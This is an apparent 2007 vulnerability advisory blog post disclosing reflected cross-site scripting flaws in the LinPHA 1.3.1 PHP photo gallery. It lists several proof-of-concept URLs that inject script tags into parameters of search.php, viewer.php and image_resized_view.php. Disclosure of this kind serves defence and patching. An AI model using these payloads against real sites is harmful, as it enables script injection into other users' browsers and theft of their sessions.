LINPHA 1.3.1 Multiple Scripts XSS

Friday, September 07, 2007
##########################################
LINPHA 1.3.1 Multiple Scripts XSS
vendor url:http://linpha.sourceforge.net
Advisore:http://lostmon.blogspot.com/2007/09/
linpha-131-multiple-scripts-xss.html
vendor informed:NO exploit available:YES
##########################################


LinPHA is an easy to use, multilingual, flexible photo/image
archive/album/gallery written in PHP. It uses a SQL database
(MySQL/PostgreSQL/SQLite) to store information about your pictures


LinPHA contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.


################
Versions
################

LinPHA 1.3.1

################
Timeline
################

Discovered:05-08-2007
disclosure:07-09-2007

###################
Examples
###################
http://localhost/linpha/actions/image_resized_view.php?
imgid=2945"><body><script>alert()</script><h1>lalala</h1></body>&wh=800x600

http://localhost/linpha/search.php?1=1&pn=2
"><script>alert()</script>#tn

http://localhost/linpha/viewer.php?album=etc/passwd">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?1=1&order=">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha//search.php?1=1&imgid=14013">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?1=1&imgid=14013">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?search_text=a&order=">
<body><script>alert()</script><h1>lalala</h1></body>

Some other params and scripts are afected...

###################### €nd ###############################

Thnx to estrella to be my ligth
Thnx to all Lostmon´s Group Team

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...